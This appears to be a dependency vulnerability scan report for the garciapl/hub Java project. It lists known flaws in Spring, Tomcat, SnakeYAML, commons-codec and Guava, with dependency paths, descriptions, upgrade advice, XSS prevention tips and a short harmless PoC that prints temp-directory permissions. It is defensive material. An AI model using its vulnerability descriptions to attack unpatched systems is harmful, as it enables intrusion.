Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-expression@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE

…and 24 more

Overview

org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.

Affected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.

Remediation

Upgrade org.springframework:spring-core to version 5.2.19.RELEASE, 5.3.14 or higher.

References

Pivotal Security Advisory

Improper Input Validation vulnerability report

medium severity

Improper Output Neutralization for Logs

Vulnerable module: org.springframework:spring-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework:spring-core@4.3.13.RELEASE

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.4.12.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-web@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-web@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-expression@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-core@4.3.13.RELEASE

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.4.12.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-web@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-web@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-expression@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-core@4.3.13.RELEASE

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.4.12.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-expression@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-expression@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE

…and 24 more

Overview

org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.

Affected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.

Remediation

Upgrade org.springframework:spring-core to version 5.3.12, 5.2.18 or higher.

References

Improper Output Neutralization for Logs vulnerability report

medium severity

Stack-based Buffer Overflow

Vulnerable module: org.yaml:snakeyaml
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.yaml:snakeyaml@1.17

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Stack-based Buffer Overflow when parsing crafted untrusted YAML files, which can lead to a denial-of-service.

Remediation

Upgrade org.yaml:snakeyaml to version 1.31 or higher.

References

Stack-based Buffer Overflow vulnerability report

low severity

Information Exposure

Vulnerable module: commons-codec:commons-codec
Introduced through: org.apache.httpcomponents:httpclient@4.5.3

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.apache.httpcomponents:httpclient@4.5.3 › commons-codec:commons-codec@1.9

Overview

commons-codec:commons-codec is a package that contains simple encoder and decoders for various formats such as Base64 and Hexadecimal.

Affected versions of this package are vulnerable to Information Exposure. When there is no byte array value that can be encoded into a string the Base32 implementation does not reject it, and instead decodes it into an arbitrary value which can be re-encoded again using the same implementation. This allows for information exposure exploits such as tunneling additional information via seemingly valid base 32 strings.

Remediation

Upgrade commons-codec:commons-codec to version 1.14 or higher.

References

Information Exposure vulnerability report

low severity

HTTP Request Smuggling

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.15.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.15.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to HTTP Request Smuggling when improper requests containing an invalid Content-Length header are not being properly rejected.

Note: Exploiting this vulnerability is also possible if Tomcat was located behind a reverse proxy that also failed to reject the request with the invalid header.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.53, 9.0.68, 10.0.27, 10.1.1 or higher.

References

HTTP Request Smuggling vulnerability report

low severity

Information Exposure

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.13.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.13.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Information Exposure. due to a concurrency bug that could cause client connections to share an Http11Processor instance resulting in responses, or part responses, to be received by the wrong client.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.78, 9.0.62, 10.0.20, 10.1.0-M14 or higher.

References

Information Exposure vulnerability report

low severity

Stack-based Buffer Overflow

Vulnerable module: org.yaml:snakeyaml
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.yaml:snakeyaml@1.17

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Stack-based Buffer Overflow when parsing crafted untrusted YAML files, which can lead to a denial-of-service.

Remediation

Upgrade org.yaml:snakeyaml to version 1.32 or higher.

References

Stack-based Buffer Overflow vulnerability report

low severity

Stack-based Buffer Overflow

Vulnerable module: org.yaml:snakeyaml
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.yaml:snakeyaml@1.17

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Stack-based Buffer Overflow in org.yaml.snakeyaml.constructor.BaseConstructor.constructObject when parsing crafted untrusted YAML files, which can lead to a denial-of-service.

Remediation

Upgrade org.yaml:snakeyaml to version 1.31 or higher.

References

Stack-based Buffer Overflow vulnerability report

low severity

Stack-based Buffer Overflow

Vulnerable module: org.yaml:snakeyaml
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.yaml:snakeyaml@1.17

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Stack-based Buffer Overflow when supplied with untrusted input, due to improper limitation for incoming data.

Remediation

Upgrade org.yaml:snakeyaml to version 1.32 or higher.

References

Stack-based Buffer Overflow vulnerability report

low severity

Cross-site Scripting (XSS)

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.21.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.21.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the SSI printenv command.

Note: Server Side Includes (SSI) is disabled by default and is intended for debugging purposes only.

Details

A cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type	Origin	Description
Stored	Server	The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected	Server	The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based	Client	The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated		The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

Web servers
Application servers
Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
Give users the option to disable client-side scripts.
Redirect invalid requests.
Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.18, 8.5.40, 7.0.94 or higher.

References

Cross-site Scripting (XSS) vulnerability report

low severity

Creation of Temporary File in Directory with Insecure Permissions

Vulnerable module: com.google.guava:guava
Introduced through: com.google.guava:guava@21.0

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › com.google.guava:guava@21.0

Remediation: Upgrade to com.google.guava:guava@32.0.0-android.

Overview

Affected versions of this package are vulnerable to Creation of Temporary File in Directory with Insecure Permissions due to the use of Java's default temporary directory for file creation in FileBackedOutputStream. Other users and apps on the machine with access to the default Java temporary directory can access the files created by this class. This more fully addresses the underlying issue described in CVE-2020-8908, by deprecating the permissive temp file creation behavior.

NOTE: Even though the security vulnerability is fixed in version 32.0.0, the maintainers recommend using version 32.0.1, as version 32.0.0 breaks some functionality under Windows.

Remediation

Upgrade com.google.guava:guava to version 32.0.0-android, 32.0.0-jre or higher.

References

Creation of Temporary File in Directory with Insecure Permissions vulnerability report

low severity

Information Disclosure

Vulnerable module: com.google.guava:guava
Introduced through: com.google.guava:guava@21.0

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › com.google.guava:guava@21.0

Remediation: Upgrade to com.google.guava:guava@30.0-android.

Overview

Affected versions of this package are vulnerable to Information Disclosure. The file permissions on the file created by com.google.common.io.Files.createTempDir allow an attacker running a malicious program co-resident on the same machine to steal secrets stored in this directory. This is because, by default, on unix-like operating systems the /tmp directory is shared between all users, so if the correct file permissions aren't set by the directory/file creator, the file becomes readable by all other users on that system.

PoC

File guavaTempDir = com.google.common.io.Files.createTempDir();
System.out.println("Guava Temp Dir: " + guavaTempDir.getName());
runLS(guavaTempDir.getParentFile(), guavaTempDir); // Prints the file permissions -> drwxr-xr-x
File child = new File(guavaTempDir, "guava-child.txt");
child.createNewFile();
runLS(guavaTempDir, child); // Prints the file permissions -> -rw-r--r--

For Android developers, choosing a temporary directory API provided by Android is recommended, such as context.getCacheDir(). For other Java developers, we recommend migrating to the Java 7 API java.nio.file.Files.createTempDirectory() which explicitly configures permissions of 700, or configuring the Java runtime's java.io.tmpdir system property to point to a location whose permissions are appropriately configured.

Remediation

There is no fix for com.google.guava:guava. However, in version 30.0 and above, the vulnerable functionality has been deprecated. In oder to mitigate this vulnerability, upgrade to version 30.0 or higher and ensure your dependencies don't use the createTempDir or createTempFile methods.

References

Information Disclosure vulnerability report

low severity

Session Fixation

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.12.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.12.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Session Fixation. When using FORM authentication there was a narrow window where an attacker could perform a session fixation attack. The window was considered too narrow for an exploit to be practical but, erring on the side of caution, this issue has been treated as a security vulnerability.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.30, 8.5.50, 7.0.99 or higher.

References

Session Fixation vulnerability report

low severity

Improper Handling of Case Sensitivity

Vulnerable module: org.springframework:spring-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework:spring-core@4.3.13.RELEASE

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-web@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-web@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-expression@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-core@4.3.13.RELEASE

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-web@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
